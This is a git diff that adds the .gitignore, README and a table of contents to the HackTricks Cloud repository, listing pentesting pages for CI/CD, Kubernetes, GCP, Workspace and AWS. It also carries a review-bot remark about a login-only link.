+ git push --set-upstream origin "$BRANCH" diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000000..6826262d3c --- /dev/null +++ b/.gitignore @@ -0,0 +1,33 @@ +.vscode +.vscode/* + + + + + +# General +.DS_Store +.AppleDouble +.LSOverride + +# Icon must end with two \r +Icon + +# Thumbnails +._* + +# Files that might appear in the root of a volume +.DocumentRevisions-V100 +.fseventsd +.Spotlight-V100 +.TemporaryItems +.Trashes +.VolumeIcon.icns +.com.apple.timemachine.donotpresent + +# Directories potentially created on remote AFP share +.AppleDB +.AppleDesktop +Network Trash Folder +Temporary Items +.apdisk \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000000..17db20c7d4 --- /dev/null +++ b/README.md @@ -0,0 +1,67 @@ +# HackTricks Cloud + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +
+ +_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ + +{% hint style="success" %} +Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. +{% endhint %} + +### **Pentesting CI/CD Methodology** + +**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** + +{% content-ref url="pentesting-ci-cd/pentesting-ci-cd-methodology.md" %} +[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) +{% endcontent-ref %} + +### Pentesting Cloud Methodology + +**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** + +{% content-ref url="pentesting-cloud/pentesting-cloud-methodology.md" %} +[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) +{% endcontent-ref %} + +### License & Disclaimer + +**Check them in:** + +{% content-ref url="https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq" %} +[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) +{% endcontent-ref %} + +### Github Stats + +![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/SUMMARY.md b/SUMMARY.md new file mode 100644 index 0000000000..008efc3d05 --- /dev/null +++ b/SUMMARY.md 
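Review bot: the "License & Disclaimer" block links to `https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq`, which is the GitBook editor URL for the space and requires a GitBook login, whereas SUMMARY.md in the same change links the same page as `https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq`; use the public URL here as well.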
@@ -0,0 +1,495 @@ +# Table of contents + +## 👽 Welcome! + +* [HackTricks Cloud](README.md) +* [About the Author](https://book.hacktricks.xyz/welcome/about-the-author) +* [HackTricks Values & faq](https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq) + +## 🏭 Pentesting CI/CD + +* [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md) +* [Github Security](pentesting-ci-cd/github-security/README.md) + * [Abusing Github Actions](pentesting-ci-cd/github-security/abusing-github-actions/README.md) + * [Gh Actions - Artifact Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md) + * [GH Actions - Cache Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md) + * [Gh Actions - Context Script Injections](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md) + * [Accessible Deleted Data in Github](pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md) + * [Basic Github Information](pentesting-ci-cd/github-security/basic-github-information.md) +* [Gitea Security](pentesting-ci-cd/gitea-security/README.md) + * [Basic Gitea Information](pentesting-ci-cd/gitea-security/basic-gitea-information.md) +* [Concourse Security](pentesting-ci-cd/concourse-security/README.md) + * [Concourse Architecture](pentesting-ci-cd/concourse-security/concourse-architecture.md) + * [Concourse Lab Creation](pentesting-ci-cd/concourse-security/concourse-lab-creation.md) + * [Concourse Enumeration & Attacks](pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md) +* [CircleCI Security](pentesting-ci-cd/circleci-security.md) +* [TravisCI Security](pentesting-ci-cd/travisci-security/README.md) + * [Basic TravisCI Information](pentesting-ci-cd/travisci-security/basic-travisci-information.md) +* [Jenkins Security](pentesting-ci-cd/jenkins-security/README.md) + * [Basic Jenkins 
Information](pentesting-ci-cd/jenkins-security/basic-jenkins-information.md) + * [Jenkins RCE with Groovy Script](pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md) + * [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md) + * [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md) + * [Jenkins Arbitrary File Read to RCE via "Remember Me"](pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md) + * [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md) +* [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md) + * [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md) + * [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md) +* [Terraform Security](pentesting-ci-cd/terraform-security.md) +* [Atlantis Security](pentesting-ci-cd/atlantis-security.md) +* [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md) + * [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md) + * [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md) +* [Okta Security](pentesting-ci-cd/okta-security/README.md) + * [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md) +* [Supabase Security](pentesting-ci-cd/supabase-security.md) +* [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md) +* [TODO](pentesting-ci-cd/todo.md) + +## ⛈️ Pentesting Cloud + +* [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md) +* [Kubernetes Pentesting](pentesting-cloud/kubernetes-security/README.md) + * [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md) + * [Pentesting Kubernetes 
Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md) + * [Kubelet Authentication & Authorization](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md) + * [Exposing Services in Kubernetes](pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md) + * [Attacking Kubernetes from inside a Pod](pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md) + * [Kubernetes Enumeration](pentesting-cloud/kubernetes-security/kubernetes-enumeration.md) + * [Kubernetes Role-Based Access Control(RBAC)](pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md) + * [Abusing Roles/ClusterRoles in Kubernetes](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md) + * [Pod Escape Privileges](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) + * [Kubernetes Roles Abuse Lab](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md) + * [Kubernetes Namespace Escalation](pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md) + * [Kubernetes External Secret Operator](pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md) + * [Kubernetes Pivoting to Clouds](pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md) + * [Kubernetes Network Attacks](pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md) + * [Kubernetes Hardening](pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md) + * [Kubernetes SecurityContext(s)](pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md) + * [Kubernetes OPA Gatekeeper](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md) + * [Kubernetes OPA Gatekeeper 
bypass](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md) + * [Kubernetes Kyverno](pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md) + * [Kubernetes Kyverno bypass](pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md) + * [Kubernetes ValidatingWebhookConfiguration](pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md) +* [GCP Pentesting](pentesting-cloud/gcp-security/README.md) + * [GCP - Basic Information](pentesting-cloud/gcp-security/gcp-basic-information/README.md) + * [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) + * [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md) + * [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md) + * [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md) + * [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md) + * [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) + * [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) + * [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) + * [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) + * [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) + * [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) + * [GCP - Filestore Post 
Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) + * [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) + * [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) + * [GCP - Logging Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md) + * [GCP - Monitoring Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md) + * [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) + * [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) + * [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) + * [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) + * [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) + * [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) + * [GCP - Apikeys Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md) + * [GCP - AppEngine Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md) + * [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md) + * [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md) + * [GCP - BigQuery Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md) + * [GCP - ClientAuthConfig 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md) + * [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) + * [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) + * [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) + * [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) + * [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) + * [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) + * [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) + * [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) + * [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) + * [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) + * [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) + * [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) + * [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) + * [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) + * [GCP - Run Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md) + * [GCP - Secretmanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md) + * [GCP - Serviceusage 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md) + * [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md) + * [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md) + * [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md) + * [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md) + * [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md) + * [GCP - local privilege escalation ssh pivoting](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) + * [GCP - Persistence](pentesting-cloud/gcp-security/gcp-persistence/README.md) + * [GCP - API Keys Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md) + * [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md) + * [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md) + * [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md) + * [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md) + * [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md) + * [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md) + * [GCP - Cloud SQL Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md) + * [GCP - Compute Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md) + * [GCP - Dataflow 
Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md) + * [GCP - Filestore Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md) + * [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md) + * [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md) + * [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md) + * [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md) + * [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md) + * [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md) + * [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md) + * [GCP - App Engine Enum](pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md) + * [GCP - Artifact Registry Enum](pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md) + * [GCP - Batch Enum](pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md) + * [GCP - Bigquery Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md) + * [GCP - Bigtable Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md) + * [GCP - Cloud Build Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md) + * [GCP - Cloud Functions Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md) + * [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md) + * [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md) + * [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md) + * [GCP - Cloud Scheduler Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md) + * [GCP - Compute 
Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md) + * [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md) + * [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md) + * [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md) + * [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md) + * [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) + * [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) + * [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md) + * [GCP - Firestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md) + * [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) + * [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md) + * [GCP - Logging Enum](pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md) + * [GCP - Memorystore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md) + * [GCP - Monitoring Enum](pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md) + * [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md) + * [GCP - Secrets Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md) + * [GCP - Security Enum](pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md) + * [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md) + * [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md) + * [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md) + * [GCP - Storage 
Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md) + * [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md) + * [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md) + * [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md) + * [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md) + * [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md) + * [GCP - App Engine Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md) + * [GCP - Artifact Registry Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md) + * [GCP - Cloud Build Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) + * [GCP - Cloud Functions Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) + * [GCP - Cloud Run Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) + * [GCP - Cloud SQL Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) + * [GCP - Compute Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) + * [GCP - IAM, Principals & Org Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md) + * [GCP - Source Repositories Unauthenticated 
Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md) + * [GCP - Storage Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md) + * [GCP - Public Buckets Privilege Escalation](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md) +* [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md) + * [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md) + * [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md) + * [GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md) + * [GWS - Admin Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md) + * [GCDS - Google Cloud Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md) + * [GCPW - Google Credential Provider for Windows](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md) + * [GPS - Google Password Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md) + * [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md) + * [GWS - App Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md) +* [AWS Pentesting](pentesting-cloud/aws-security/README.md) + * [AWS - Basic 
Information](pentesting-cloud/aws-security/aws-basic-information/README.md) + * [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md) + * [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md) + * [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md) + * [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md) + * [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md) + * [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md) + * [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md) + * [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md) + * [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md) + * [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md) + * [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md) + * [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md) + * [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md) + * [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md) + * [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) + * [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md) + * [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md) + * [AWS - RDS 
Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md) + * [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md) + * [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md) + * [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md) + * [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md) + * [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md) + * [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md) + * [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md) + * [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md) + * [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md) + * [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md) + * [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md) + * [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md) + * [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md) + * [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md) + * [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md) + * [AWS - EC2, EBS, SSM & VPC Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md) + * [AWS - 
